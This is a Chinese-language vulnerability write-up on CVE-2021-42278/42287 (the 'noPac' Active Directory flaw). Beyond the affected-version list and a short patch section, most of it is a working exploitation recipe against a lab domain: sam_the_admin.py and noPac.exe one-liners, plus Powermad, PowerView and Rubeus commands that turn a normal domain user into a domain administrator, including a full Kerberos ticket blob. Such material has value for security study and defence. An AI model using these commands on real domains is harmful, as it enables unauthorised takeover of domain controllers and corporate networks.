CVE-2021-42278/42287(域控)漏洞分析与利用

0x00 漏洞介绍

2021 年 11 月 9 日,国外研究员在推特上发布了 Active Directory 相关的 CVE,CVE-2021-42278 & CVE-2021-42287 ,两个漏洞组合可导致域内普通用户权限提升至域管权限。

  • CVE-2021-42278,机器账户的名字一般来说应该以$结尾,但AD没有对域内机器账户名做验证。
  • CVE-2021-42287,配合 CVE-2021-42278 使用,创建与域控机器账户名字相同的机器账户(不以$结尾),账户请求一个TGT后,更名账户,然后通过S4U2self 申请TGS Ticket,接着域控在 TGS_REP 阶段,这个账户不存在的时候,DC会使用自己的密钥加密 TGS Ticket ,提供一个属于该账户的 PAC,然后我们就得到了一个高权限ST。

0x01 影响范围

  • CVE-2021-42287

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    Windows Server 2012 R2 (Server Core installation)
    Windows Server 2012 R2
    Windows Server 2012 (Server Core installation)
    Windows Server 2008 R2 for x64-based Systems Service Pack 1(Server Core installation)
    Windows Server 2012
    Windows Server 2008 R2 for x64-based Systems Service Pack 1
    Windows Server 2008 for x64-based Systems Service Pack 2(Server Core installation)
    Windows Server 2008 for x64-based Systems Service Pack 2
    Windows Server 2008 for 32-bit Systems Service Pack 2(Server Core installation)
    Windows Server 2008 for 32-bit Systems Service Pack 2
    Windows Server 2016 (Server Core installation)
    Windows Server 2016
    Windows Server, version 20H2 (Server Core Installation)
    Windows Server, version 2004 (Server Core installation)
    Windows Server 2022 (Server Core installation)
    Windows Server 2022
    Windows Server 2019 (Server Core installation)
    Windows Server 2019

  • CVE-2021-42278

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    Windows Server 2012 R2
    Windows Server 2012 (Server Core installation)
    Windows Server 2012
    Windows Server 2008 R2 for x64-based Systems Service Pack 1(Server Core installation)
    Windows Server 2008 R2 for x64-based Systems Service Pack 1
    Windows Server 2008 for x64-based Systems Service Pack 2(Server Core installation)
    Windows Server 2008 for x64-based Systems Service Pack 2
    Windows Server 2008 for 32-bit Systems Service Pack 2(Server Core installation)
    Windows Server 2008 for 32-bit Systems Service Pack 2
    Windows Server 2016 (Server Core installation)
    Windows Server 2016
    Windows Server, version 20H2 (Server Core Installation)
    Windows Server, version 2004 (Server Core installation)
    Windows Server 2022 (Server Core installation)
    Windows Server 2019 (Server Core installation)
    Windows Server 2022
    Windows Server 2019
    Windows Server 2012 R2 (Server Core installation)

0x02 漏洞复现

漏洞环境

  • 域控

    1
    2
    3
    4
    域名:testvul.com
    账户:administrator
    密码:test123!
    计算机名:WIN-6A1HJFP87NE

image-20211219104525345

  • 普通域账户

    1
    2
    账户:testexp
    密码:Exp@123

image-20211219104611535

  • 攻击机

    1
    2
    3
    4
    kali Linux
    ip:192.168.12.3
    利用脚本:https://github.com/WazeHell/sam-the-admin
    Impacket v0.9.24

一键exp

Python 利用脚本:https://github.com/WazeHell/sam-the-admin

前置条件:需要一个域用户

利用过程:

1
python3 sam_the_admin.py "testvul/testexp:Exp@123" -dc-ip 192.168.12.2 -shell

image-20211219114305719

十分简单粗暴,只需要一个域用户账户即可拿到 DC 的控制权限。

深入分析利用

具体流程:

  1. 首先创建一个机器账户,可以使用 impacket 的 addcomputer.py或是powermad

    addcomputer.py是利用SAMR协议创建机器账户,这个方法所创建的机器账户没有SPN,所以可以不用清除

  2. 清除机器账户的servicePrincipalName属性

  3. 将机器账户的sAMAccountName,更改为DC的机器账户名字,注意后缀不带$

  4. 为机器账户请求TGT

  5. 将机器账户的sAMAccountName更改为其他名字,不与步骤3重复即可

  6. 通过S4U2self协议向DC请求ST

  7. 进行 DCsync Attack

普通域账户

1、首先 testexp用户是一个普通的域用户:

image-20211219104611535

新增机器账户

2、通过利用 powermad.ps1 新增机器帐号(域用户默认可以新建10个机器账户)

下载地址:https://github.com/Kevin-Robertson/Powermad

命令语法:

1
2
3
4
5
6
7
8
9
10

powershell Set-ExecutionPolicy Bypass -Scope Process 

Import-Module .\Powermad.ps1

# 运行完后需要输入一下密码:whoami(可任意密码)
New-MachineAccount -MachineAccount saulgoodman -Domain testvul.com -DomainController WIN-6A1HJFP87NE.testvul.com -Verbose

# 验证是否添加成功
net group "domain computers" /domain

image-20211219122042212

清除SPN信息

3、clear its SPNs(清除SPN信息)

1
2
3
4
5

# 导入一下 PowerView.ps1
Import-Module .\PowerView.ps1

Set-DomainObject "CN=saulgoodman,CN=Computers,DC=testvul,DC=com" -Clear 'serviceprincipalname' -Verbose

image-20211219122640220

重设机器名称

4、reset the computer name(重设机器名称)

1
Set-MachineAccountAttribute -MachineAccount saulgoodman -Value "WIN-6A1HJFP87NE" -Attribute samaccountname -Verbose

image-20211219123212279

请求TGT

5、Request TGT (请求TGT)

Rubeus:https://github.com/GhostPack/Rubeus

1
./Rubeus.exe asktgt /user:WIN-6A1HJFP87NE /password:whoami /domian:testvul.com /dc:WIN-6A1HJFP87NE.testvul.com /nowrap

image-20211219143057752

改回原来属性

6、Change Machine Account samaccountname(改回原来属性,或者其他的)

1
Set-MachineAccountAttribute -MachineAccount saulgoodman -Value "saulgoodman1" -Attribute samaccountname -Verbose

image-20211219143206857

获取票据

7、Request S4U2self(获取票据)

1
./Rubeus.exe s4u /self /impersonateuser:"Administrator" /altservice:"ldap/WIN-6A1HJFP87NE.testvul.com" /dc:"WIN-6A1HJFP87NE.testvul.com" /ptt /ticket:doIFMjCCBS6gAwIBBaEDAgEWooIEQzCCBD9hggQ7MIIEN6ADAgEFoQ0bC1RFU1RWVUwuQ09NoiAwHqADAgECoRcwFRsGa3JidGd0Gwt0ZXN0dnVsLmNvbaOCA/0wggP5oAMCARKhAwIBAqKCA+sEggPnD/AcnlKhVtqXVzXf9cC5O3xdB2K3hAuCHF4wDiy2mnZ0VbdcqrfaDTi24soBSMBy8X3EJ2BxyOK/BtBYR4YzNZwHg02jHE0PJO100Qin5aayv25eahO1aDiEj4HWeayzA9lS8p93enlHy4e5iVnEsoh92ug6ujhp9TaVtIBacdWk+FHZxAvLX71sk4CH0pmqXW1NQjLlrYmh70fyOVns7BBnFRPBxPwEIGbqx3Xuq7ZpZGmvbanZECQSdW6qXRVRqAb2kYilREylLYh+PeNFcjKn9u3aWIBmsR4jl3XUTEDlNhWnnxE8tL1U+72OKtWWCm8G0BurWiefox5Z2JdADcIVvJVAjZUyXsjOnIfA9Cg6KF37QorHwB08nIicwIUaTJYyxe0vz9z0c/SVQXLpPyRvSdNh7DYa2AA5tWP3LwJSyrko6nsCZ2HztvliffvrbTCA0VgHRdomeNyEYKYJjIzSwMCqnLWsM5etZwYRKUfPsNYrXzpqR/iaYWshoMtz42ghDHCFUdoIH0XzkNiYW8sxwqWiXuvPtALbXWErG1hEQxcuW/yw93qpprx6okMpjD1qjwkR09j45Hgk7Y76aaMrUzuBMZjuWxwVdBSGmyBnViNCO9WlXddS6veXAWNdy5zlXJfpt6FTF2UHRW2MLnyHvD5/SKPwrAsXFBPzugNKVUu/D0kEr2nsF7gFQWic6u0sGEqMUnzdUL5hB+p3YePiU36Tu60sbTQkPOg8JlduNVUNrSmrzwOsTC+SFNX8NQZ6nu+/4gkQN+yDI4CTokl1qZ7Ct3dZqn525PnnYPERXQte534Q3FdXM5bjhTomW7v0ORj0XBN+0qWsPcoTJCEAo78y/+/Cg+JxZ5nfV2v+fgNkePmt7RHND5XYtV+5PXKaT2wI9/v+YAWFTHNFdNAPI/1742L26Qfha7rTQAmNiU3LZWaoHSyMg+OXoT9B1O9ONyiT736hYKKPkiH5/1zRDQwvFig62eO93Uec81L3rYUUhhAC/E1FxoiUVmlmzyfunFjQ6rhGql9CpcuvOF3HveP8lF2reXwsxZRdqG9mZEiCCQ5/CGCtOTE5xmDB1gqlYaJvdX774Y1OJMGep51wD+2z9juYgobpA9yxsgIuNgARprHX4Qc7cOsUhSOq2Wep++Fmy35FCo5WZK7JZbAmynsNGNxOXT2UGe7Gf3IyY5RB28Ps2HxgKgt3TAd9rQlj/QmqjpGmXA4asxfRiqnvdHRoTj3omHF3Q4ZvO1OLcSg3NSeOSP56oDAHedl6SWwtJAITqcvd8e0t+7rsOiR762nIrev6dJvXgROxE/bDfJgSZzpDo4HaMIHXoAMCAQCigc8Egcx9gckwgcaggcMwgcAwgb2gGzAZoAMCARehEgQQoF35WdUPtmjXCQESgXAaBqENGwtURVNUVlVMLkNPTaIcMBqgAwIBAaETMBEbD1dJTi02QTFISkZQODdORaMHAwUAQOEAAKURGA8yMDIxMTIxOTA2MjkxMVqmERgPMjAyMTEyMTkxNjI5MTFapxEYDzIwMjExMjI2MDYyOTExWqgNGwtURVNUVlVMLkNPTakgMB6gAwIBAqEXMBUbBmtyYnRndBsLdGVzdHZ1bC5jb20=

image-20211219144251872

noPac利用

使用:https://github.com/cube0x0/noPac (需安装 .net 4.0+)

验证

1、扫描是否存在漏洞:

1
.\noPac.exe scan -domain testvul.com -user testexp -pass 'Exp@123'

image-20211219144814261

利用

2、漏洞利用:

1
./noPac.exe -domain testvul.com -user testexp -pass 'Exp@123' /dc WIN-6A1HJFP87NE.testvul.com /mAccount saulgoodman /mPassword passW0rd /service cifs /ptt

0x03 漏洞修复

  1. 微软官方已推出补丁:KB5008602、KB5008380
  2. 通过域控的 ADSI 编辑器工具将 AD 域的 MAQ 配置为 0,中断此漏洞的利用链。